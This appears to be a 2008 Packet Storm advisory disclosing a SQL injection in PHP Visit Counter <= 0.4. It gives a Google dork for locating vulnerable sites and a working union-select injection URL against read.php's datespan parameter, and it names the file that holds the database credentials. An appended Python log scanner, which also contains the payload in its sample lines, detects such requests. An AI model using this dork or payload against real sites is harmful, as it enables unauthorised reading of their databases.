phpvisitcounter-sql.txt

2008-05-31T00:00:00
ID PACKETSTORM:66865
Type packetstorm
Reporter Lidloses_Auge
Modified 2008-05-31T00:00:00

Description

                                        
###############################################################  
#  
# PHP Visit Counter <= 0.4 - SQL Injection Vulnerability  
#   
# Vulnerability discovered by: Lidloses_Auge   
# Greetz to: -=Player=- , Suicide, g4ms3, enco,  
# GPM, Free-Hack, Ciphercrew, h4ck-y0u  
# Date: 30.05.2008  
#  
###############################################################  
#   
# Dork: inurl:"read.php?datespan="  
#  
# Vulnerability:  
#  
# 1.) SQL Injection  
#  
# 1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/*  
#  
# Notes:  
#  
# Output is displayed as INT, so you have to convert it into ASCII and  
# scan every single letter to get the whole name.  
# MySQL Data is stored in [Counterpath]/variables.php  
#  
###############################################################  
  
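A log check for the request pattern in this advisory, as an added example that is not part of the original advisory or of PHP Visit Counter: it flags read.php requests whose datespan value is not a short plain token and reports the SQL constructs found in it. The allowed-value pattern, the access log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate datespan value is a short plain token.
ALLOWED = re.compile(r"[A-Za-z0-9_-]{1,32}")
# SQL constructs of the kind seen in the advisory's request.
SQL_TOKENS = re.compile(
    r"union\s+select|group\s+by|substring\s*\(|ascii\s*\(|version\s*\(|/\*|--",
    re.I,
)
# Request field of a common/combined access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses, made-up path prefix).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/May/2008:10:00:01 +0000] "GET /counter/read.php?action=read&cat=portal&datespan=7 HTTP/1.1" 200 512',
    '192.0.2.44 - - [31/May/2008:10:00:09 +0000] "GET /counter/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/* HTTP/1.1" 200 498',
    '192.0.2.10 - - [31/May/2008:10:00:12 +0000] "GET /index.php?datespan=x%27 HTTP/1.1" 200 100',
]

def suspicious_datespan(line):
    """Return (decoded_value, sql_tokens) for a read.php request whose
    datespan falls outside ALLOWED, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/read.php"):
        return None
    # parse_qs URL-decodes, so '+' and %xx encoding is undone before matching.
    for value in parse_qs(url.query, keep_blank_values=True).get("datespan", []):
        if not ALLOWED.fullmatch(value):
            tokens = {re.sub(r"\s+", " ", t.lower()) for t in SQL_TOKENS.findall(value)}
            return value, sorted(tokens)
    return None

def scan(lines):
    """Return [(line_number, value, tokens)] for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = suspicious_datespan(line)
        if hit:
            hits.append((n, *hit))
    return hits

if __name__ == "__main__":
    for n, value, tokens in scan(SAMPLE_LOG):
        print(f"line {n}: datespan={value!r} tokens={tokens}")
```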